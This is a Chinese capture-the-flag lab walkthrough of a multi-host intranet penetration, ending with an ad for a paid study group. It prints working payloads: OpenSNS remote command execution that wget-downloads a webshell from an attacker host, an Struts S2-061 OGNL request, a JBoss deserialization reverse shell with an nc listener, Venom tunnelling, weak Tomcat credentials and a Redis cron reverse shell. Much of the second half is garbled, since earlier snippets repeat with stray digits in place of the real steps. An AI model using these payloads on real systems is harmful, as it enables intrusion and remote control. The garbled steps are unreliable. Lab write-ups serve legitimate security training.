靶场wp感谢 Nacl大佬提供

所有CFS靶场环境均在星球发布，目前已有5套，可以随时体验，并且环境永不关闭，每星期都会发布一个新靶场，星球还有专业的人员帮助你学习，只需要加入星球，就可体验所有优质服务。

进入正题

使用fscan进行主机发现

82和7001先从82入手

opensns 此版本有命令执行 payload

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule
%26id[status]=1%26id[method]=Schedule-
%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args
]=cmd=system(id

上webshell（这里不采取写马命令 直接让他远程下载我的一句话）

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)

下载成功后上蚁剑

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080

靶机
wget 1.1.1.1:8081/a
./a -rhost 1.1.1.1 -rport 8080

执行完成之后 在 venom 控制端进行开启socks代理操作

Venom Admin Node Start...

____ ____ { v1.1 author: Dlive }
  / /____ ____ ____ _____
 Y // __  /  /  / 
 / ___/| | ( <_> ) Y Y 
___/ ___ >___| /____/|__|_| /
/ / /
(admin node) >>>
(admin node) >>>
(admin node) >>>
[+]Remote connection: ip:port
[+]A new node connect to admin node success
(admin node) >>>
(admin node) >>> goto 1
node 1
(node 1) >>> socks 12345
a socks5 proxy of the target node has started up on the local port 12345.

代理开启完成 上传fscan 进行内网扫描

wget 1.1.1.1:8081/f
chmod +x f
./f -h 172.20.21.0/24
./f -h 10.6.10.0/24

得 result

172.20.21.85:8083 open
172.20.21.85:8009 open
172.20.21.52:8009 open
172.20.21.154:80 open
172.20.21.85:8080 open
172.20.21.52:8080 open
172.20.21.46:8080 open
172.20.21.135:6379 open
[*] WebTitle:http://172.20.21.85:8083 code:404 len:0 title:None
[+] Redis:172.20.21.135:6379 unauthorized
[+] Redis:172.20.21.135:6379 like can write /var/spool/cron/
[*] WebTitle:http://172.20.21.52:8080 code:200 len:20 title:Apache
Tomcat/8.0.43
[*] WebTitle:http://172.20.21.46:8080 code:200 len:234 title:S2-059 demo
[*] WebTitle:http://172.20.21.85:8080 code:200 len:1554 title:Welcome to
JBoss AS
[+] InfoScan:http://172.20.21.85:8080 [Jboss JBOSS]
[*] WebTitle:http://172.20.21.154 code:200 len:28 title:OpenSNS v5开源社
群系统
[+] InfoScan:http://172.20.21.154 [ThinkPHP]
[+] http://172.20.21.52:8080/manager/html tomcat tomcat
[+] http://172.20.21.52:8080 poc-yaml-tomcat-manager-week
10.6.10.9:6379 open
10.6.10.8:80 open
[+] Redis:10.6.10.9:6379 unauthorized
[+] Redis:10.6.10.9:6379 like can write /var/spool/cron/
[*] WebTitle:http://10.6.10.8 code:200 len:28 title:OpenSNS v5开源社
群系统
[+] InfoScan:http://10.6.10.8 [ThinkPHP]

对获得的内网信息进行分析得到

redis 10.6.10.9
redis 172.20.21.135
OpenSNS 172.20.21.154 10.6.10.8
S2-059 172.20.21.46:8080
JBoss 172.20.21.85:8080
tomcat 172.20.21.52:8080

这个redis 不确定是一个还是两个 先放到最后来分析 首先S2-059这里标题是S2-059 但是用059的payload是打不通的 得用061的

POST / HTTP/1.1
Host: 172.20.21.46:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----
WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 829
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).
(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).
(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")
).(#bean.setBean(#stack)).(#context=#bean.get("context")).
(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).
(#bean.setBean(#macc)).
(#emptyset=#instancemanager.newInstance("java.util.HashSet")).
(#bean.put("excludedClasses",#emptyset)).
(#bean.put("excludedPackageNames",#emptyset)).
(#arglist=#instancemanager.newInstance("java.util.ArrayList")).
(#arglist.add("id")).
(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")
).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

查看IP这里没有其他的网卡 继续打jboos这里有个CVE-2015-7501 寻找利用方法

git clone https://github.com/joaomatosf/JavaDeserH2HC
进目录
javac -cp .:commons-collections-3.2.1.jar
ReverseShellCommonsCollectionsHashMap.java
执行完成后再执行另一条命令
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMa
ip:port
完成后生成一个ReverseShellCommonsCollectionsHashMap.ser文件,注意这里的ip和端口就是反弹
到服务器的ip和监听的端口
然后在服务器上使用nc开启监听
nc -lvnp port
这里服务器的ip和监听的的端口就是上文的ip和端口
proxychains curl http://172.20.21.85:8080/invoker/readonly --data-binary
@ReverseShellCommonsCollectionsHashMap.ser
查看服务器,反弹shell成功

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
0

同样是只有一个网卡 继续打tomcat此版本可以进入manager 上传war文件 从而getshell war文件制作（将jsp木马压缩成zip 在将后缀名改为war即可） 开始操作弱密码tomcat/tomcat上传点

上传成功查看回显

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
1

上蚁剑 挂代理

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
2

tomcat存在两张网卡 检测目标能否出网

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
3

目标 出网 继续用同样的方法上传 venom 和 fscan

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
4

在 vps上配置socks

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
5

查看result

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
6

分析

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
7

先打web站点joomla 此版本后台修改php 直接上马 后台地址

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
8

账户/密码 superadmin/123456一定要是这个账户 admin 不行 进后台 Templates 位置编辑文件路径

/index.php? s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26 id[status]=1%26id[method]=Schedule-
>_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd
=system(%27wget%201.1.1.1:8081/1.php%27)
9

也是只有一个网卡 接下来看Windows 6.1观察开了445和139使用smb客户端进行连接

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
0

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
1

上msf

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
2

到这里利用失败 网上找了一下 改两个参数

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
3

再次利用

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
4

利用成功 网卡仍只有一个 那么接下来还剩下 redis mysql 和7001 端口 的weblogic先讲mysql这个数据库我把他们的利用方法都尝试完了都没打通 最后去问了我们的星球专属CFS服务人员，被告知 这个玩意没有漏洞

好家伙redis这边就是未授权访问+计划任务反弹shell 首先vps上监听端口

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
5

然后我们直接利用fscan写计划任务反弹shell

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
6

这个IP地址就和我们之前扫到的是一样的 那就还剩下7001了

虽然页面Not Found 但是Weblogic漏洞依然存在 上Liqun

ip a对目标内网进行扫描 继续上传fscan以及Venom

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
7

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
8

查看 result

vps
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
9

分析一下

靶机
wget 1.1.1.1:8081/a
./a -rhost 1.1.1.1 -rport 8080
0

TIKi数据库连接失败Tiki Wiki CMS Groupware 认证绕过漏洞（CVE-2020-15906）无法被利用 因该漏洞需要爆破60次以上的管理员密码 附上poc

靶机
wget 1.1.1.1:8081/a
./a -rhost 1.1.1.1 -rport 8080
1

最后欢迎大家加入我们的知识星球，更多的资讯和内容都将在星球内开放